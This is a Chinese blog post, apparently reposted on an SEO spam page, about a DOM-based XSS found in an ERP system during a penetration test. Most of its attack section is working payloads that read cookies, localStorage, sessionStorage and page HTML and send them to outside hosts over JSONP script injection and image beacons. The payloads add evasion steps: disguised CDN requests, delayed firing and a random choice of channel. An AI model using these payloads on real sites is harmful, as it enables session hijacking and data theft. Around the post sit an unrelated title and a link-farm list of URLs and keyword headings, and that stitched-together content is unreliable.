当前位置: 首页 > wzjs >正文

网站搭建多少钱做商城购物网站

网站搭建多少钱,做商城购物网站,手机投资理财网站建设,做儿童业态招商要去哪些网站声明 本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。 1. 概述 在一次针对甲方ERP系统的渗透…

声明

本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。

1. 概述

在一次针对甲方ERP系统的渗透测试中,我发现了一个隐秘的DOM型XSS漏洞。这种表面无害的漏洞通过巧妙构造的Payload,能够绕过同源策略、突破CSP防御,最终实现敏感数据自动化收割并发送到攻击者服务器。本文将完整呈现漏洞从发现到武器化的全路径攻击链。

2. 正文

0x01 漏洞发现:静态代码审计

漏洞代码定位:

// 高危渲染逻辑(核心系统模块)function getAppProps() {web.portal.appProps = skysz.ajax.getSync("./web/portal/appProps");skysz.$("app.name").innerHTML = web.portal.appProps.appName;document.title = skysz.$("app.name").innerText;

漏洞成因分析

  • 信任后端返回数据,未做消毒处理
  • 使用.innerHTML渲染不可控内容
  • API响应头缺失X-Content-Type-Options: nosniff

致命漏洞链:
后端JSON接口 → 前端innerHTML渲染 → DOM解析执行
当接口返回appName: '<img οnerrοr=恶意代码>'时,立即触发XSS

0x02 漏洞验证
// 劫持接口返回实现弹窗验证
Object.defineProperty(web.portal, 'appProps', {  get: () => ({ appName: '<img src=x onerror=alert(window.origin)>' })});//触发弹窗
getAppProps();

0x03 数据外泄多种姿势

1、JSONP协议(跨域数据劫持)

Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="const script = document.createElement('script');script.src = 'https://legit-cdn.org/log?callback=__exfil&data=' + btoa(JSON.stringify({storage: localStorage,sessions: sessionStorage}));document.body.appendChild(script);">`})
});//创新方案:伪装合法的CDN请求规避WAF检测

2、图片信标突破(隐蔽+长度优化)

<JAVASCRIPT>
Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="(function(){// 双通道智能备份传输const data = {cookies: document.cookie,ls: localStorage,ss: sessionStorage};// 通道1:JSONP主力传输(完整数据)const jsonpScript = document.createElement('script');jsonpScript.src = 'https://cdn.trusted.com/analytics.js?' + 'cid=${Math.random().toString(36).substr(2)}&' +'data=' + btoa(JSON.stringify(data));// 通道2:图片信标备份(关键数据)const beaconImg = new Image();beaconImg.src = 'https://log.tracking.com/pixel.gif?' +'c=' + encodeURIComponent(data.cookies);setTimeout(() => {document.head.appendChild(jsonpScript);document.body.appendChild(beaconImg);}, 2000); // 延时触发绕过行为监控})();">`})
});

3、混合传输模式:随机切换JSONP/Image

Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="(function(){// 组合敏感数据const payload = {cookie: document.cookie,storage: JSON.stringify(localStorage),dom: document.documentElement.innerHTML.slice(0,2000)};// 多路传输保障const jsonpFn = () => {const s = document.createElement('script');s.src = 'http://10.191.129.67:8000/j?d='+btoa(JSON.stringify(payload))+'&t='+Date.now();};const imgFn = () => {new Image().src = 'http://10.191.129.67:8000/i.gif?c='+encodeURIComponent(payload.cookie);};// 随机化传输策略Math.random() > 0.5 ? jsonpFn() : imgFn();})();">`})
});

4、数据外带核心总结

3. 总结

漏洞挖掘规则:

1. **动态渲染点追踪**:- 全局搜索`.innerHTML`、`.outerHTML`、`document.write`- 检查Vue/React的`v-html`和`dangerouslySetInnerHTML`2. **API响应可控性验证**:- 修改后端返回的JSON内容- 测试XSS向量在不同上下文的触发情况3. **同源策略突破路径**:```javascript// 四重渗透路径检测const CHANNELS = ['fetch','WebSocket','navigator.sendBeacon','new Image()'];

4. 结语

愿诸君以深度防御为盾,以持续审计为刃,在代码构建的数字迷宫中,搭建不可逾越的安全长城。


文章转载自:

http://ulwVQCTp.wqhLj.cn
http://ugWgEcXS.wqhLj.cn
http://yoOvD8PT.wqhLj.cn
http://loPOZVuS.wqhLj.cn
http://j6jaTL1v.wqhLj.cn
http://i12pZprc.wqhLj.cn
http://AlukLNQZ.wqhLj.cn
http://qHet8rN4.wqhLj.cn
http://TkqlULjV.wqhLj.cn
http://1X3As8jT.wqhLj.cn
http://03DlWdze.wqhLj.cn
http://0oeQXnWV.wqhLj.cn
http://rXFyQoeX.wqhLj.cn
http://naODYfHM.wqhLj.cn
http://gcybNXoM.wqhLj.cn
http://2I0aQjSL.wqhLj.cn
http://uYCXPD1Q.wqhLj.cn
http://NnGIfNx7.wqhLj.cn
http://9fOxuHrz.wqhLj.cn
http://2hUZa8rg.wqhLj.cn
http://2QSS4M9F.wqhLj.cn
http://NEbhwtNA.wqhLj.cn
http://ZBVYsGLp.wqhLj.cn
http://xFYyFm1I.wqhLj.cn
http://UJfgN3aH.wqhLj.cn
http://sL2ypInw.wqhLj.cn
http://Elz7Rby4.wqhLj.cn
http://XeezbWLL.wqhLj.cn
http://GucpP6sR.wqhLj.cn
http://VXDGd0wr.wqhLj.cn
http://www.dtcms.com/wzjs/660012.html

相关文章:

  • 白色网站源码东营做网站哪里好
  • wordpress 对接酷qseo优化排名易下拉用法
  • 做网站开发的商标注册济南品质网站建设费用
  • 网站关键词词库做网站云服务器还是云虚拟主机
  • 网站设计怎么保持风格一致百度如何注册公司网站
  • 企业管理咨询上班好吗高级seo
  • 360安全网站怎么做号码认证济宁建设网站首页
  • 微信网站开发登录网站域名价值查询
  • 做网站需要注册的那种做网站找个人还是找公司
  • 便民类网站 做宁波定制网站建设
  • 聊天网站开发wordpress修改固定链接404
  • 冀icp 网站建设怎么更改织梦网站文章样式
  • 服装设计网站模板下载宁波模板建站哪家服务专业
  • 企业网站哪家做得好哪有网站建设的
  • 响应式网站模板代码站长素材ppt模板免费下载
  • 为企业建网站过时了营销系统平台
  • 网站开发的目的 实习报告安徽和县住房城乡建设局网站
  • 做3d打印网站百度seo排名优化公司推荐
  • 做优化网站怎么优化代码企业常见问题及解决方案
  • PHP网站开发用什么电脑自己网上开店怎么做
  • 灵璧有做公司网站的吗网页设计欣赏熊出没
  • 网站建设价格明细郯城网站建设
  • 做网站开发服务商店面设计多少钱一个平方
  • 建设网站方式有哪些怎么注册企业网站域名
  • jsp网站开发书籍推荐重庆人社app
  • 榆林网站优化彬县网新闻最新消息
  • 广州市建设企业网站价格网络营销活动策划方案模板
  • 织梦做网站主页容易吗不愁销路的小工厂项目
  • 教学系统设计 网站开发设计师 必备的网站
  • 网站收录入口申请获取网站的路径